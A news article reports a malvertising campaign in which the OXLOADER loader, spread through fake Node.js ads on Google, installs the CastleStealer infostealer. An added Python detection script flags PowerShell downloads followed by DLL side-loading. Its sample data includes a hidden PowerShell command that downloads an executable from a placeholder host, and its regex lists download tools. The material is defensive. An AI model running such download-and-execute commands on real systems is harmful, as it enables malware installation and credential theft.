
OXLOADER: New Malware Loader Spreading via Google Ads

The point: A new loader called OXLOADER is being distributed via malvertising on Google and installs the infostealer CastleStealer using sophisticated obfuscation techniques with very low detection rates.

Security analysts from Elastic Security Labs have documented a campaign in which the malware loader OXLOADER is being distributed via manipulated Google ads. The goal is to install the password thief CastleStealer on victim systems.

The campaign, internally designated REF8372, exploits fake advertisements in the Google network. The ads appear in search results for popular software such as the LTS version of Node.js and redirect users to manipulated websites. The ads ran under the name of a Ukrainian advertising account; Google removed the campaign in mid-May 2026.

On the fake website, a malicious script is delivered via the cloud storage service Storj. The script displays a fake installation dialog while downloading the OXLOADER file via PowerShell in the background. OXLOADER requests UAC privileges and then uses DLL side-loading to load a manipulated library that decrypts and executes the .NET-based infostealer CastleStealer in system memory.
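The chain above (a hidden PowerShell download followed by a signed host binary side-loading an unsigned DLL from a user-writable directory) is something a defender can correlate from endpoint telemetry. The following is an added example, not code from Elastic Security Labs or from the article: a small Python correlation over constructed process-creation and image-load events. The event schema, hostnames, file paths, domain `example.invalid` and the 15-minute window are assumptions for illustration; real deployments would read the equivalent fields from Sysmon or EDR logs.

```python
import re
from dataclasses import dataclass
from typing import List

# Cmdlets / .NET calls commonly used to fetch a payload from PowerShell.
DOWNLOAD_PATTERN = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|\bcurl\b|\bwget\b",
    re.I,
)
# Directories a standard user can write to without elevation (assumed list).
USER_WRITABLE = re.compile(r"^c:\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\", re.I)


@dataclass
class Event:
    ts: int                   # seconds; constructed values in the sample below
    host: str
    kind: str                 # "process" (process creation) or "imageload" (DLL load)
    image: str                # path of the process
    cmdline: str = ""
    loaded: str = ""          # imageload only: path of the loaded DLL
    loaded_signed: bool = True
    image_signed: bool = True


def is_powershell_download(ev: Event) -> bool:
    """PowerShell started with a download primitive on its command line."""
    return (
        ev.kind == "process"
        and ev.image.lower().endswith(("powershell.exe", "pwsh.exe"))
        and DOWNLOAD_PATTERN.search(ev.cmdline) is not None
    )


def is_sideload_candidate(ev: Event) -> bool:
    """A signed process loading an unsigned DLL from its own user-writable directory."""
    if ev.kind != "imageload" or not ev.image_signed or ev.loaded_signed:
        return False
    host_dir = ev.image.lower().rsplit("\\", 1)[0]
    dll_dir = ev.loaded.lower().rsplit("\\", 1)[0]
    return host_dir == dll_dir and USER_WRITABLE.match(ev.loaded) is not None


def correlate(events: List[Event], window: int = 900) -> List[dict]:
    """Pair each side-load candidate with the latest preceding PowerShell download on the same host."""
    findings = []
    downloads = sorted((e for e in events if is_powershell_download(e)), key=lambda e: e.ts)
    for ev in sorted(events, key=lambda e: e.ts):
        if not is_sideload_candidate(ev):
            continue
        prior = [d for d in downloads if d.host == ev.host and 0 <= ev.ts - d.ts <= window]
        if prior:
            findings.append({"host": ev.host, "download_ts": prior[-1].ts,
                             "sideload_ts": ev.ts, "dll": ev.loaded})
    return findings


# Constructed telemetry; none of these paths or hosts come from the report.
SAMPLE_EVENTS = [
    # ws-01: the two-stage pattern described in the article.
    Event(1000, "ws-01", "process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          cmdline="powershell -w hidden -c \"iwr https://example.invalid/setup -OutFile $env:APPDATA\\setup.exe\""),
    Event(1180, "ws-01", "imageload", r"C:\Users\alice\AppData\Roaming\vendor\app.exe",
          loaded=r"C:\Users\alice\AppData\Roaming\vendor\helper.dll", loaded_signed=False),
    # ws-02: an admin script that downloads a patch, but no side-load follows.
    Event(2000, "ws-02", "process", r"C:\Program Files\PowerShell\7\pwsh.exe",
          cmdline="pwsh -c \"Invoke-WebRequest https://updates.example.invalid/patch.msi -OutFile C:\\temp\\patch.msi\""),
    # ws-03: unsigned plugin under Program Files (not user-writable), no download.
    Event(3000, "ws-03", "imageload", r"C:\Program Files\Vendor\app.exe",
          loaded=r"C:\Program Files\Vendor\plugin.dll", loaded_signed=False),
]


def run_demo() -> List[dict]:
    return correlate(SAMPLE_EVENTS)


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

Only `ws-01` is reported: the download on `ws-02` has no side-load after it, and the unsigned DLL on `ws-03` lives under `Program Files`, which the rule treats as non-writable by a standard user. Tuning the window and the writable-directory list to the environment is the main knob; the signature fields are the part that most needs trustworthy telemetry.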

OXLOADER employs multiple obfuscation techniques: control flow flattening, opaque predicates, mixed boolean arithmetic, self-modifying decryption stubs, and abuse of the PE .reloc section to carry shellcode. This construction results in very low detection rates by static scanners and sandbox systems.

CastleStealer is specifically designed to extract system data, passwords, and cryptocurrency information. OXLOADER contains exclusion criteria that abort the infection if the system is configured for a language or region of the Commonwealth of Independent States. According to the analysts, this indicates that the actors are based in the Russian-speaking region and primarily pursue financial objectives.


Source: www.it-daily.net · Published 24 June 2026
Lumi AI News — AI-assisted curation in accordance with Art. 50 EU AI Act. Paraphrasing and classification by Lumi News Pipeline v1.7.1.
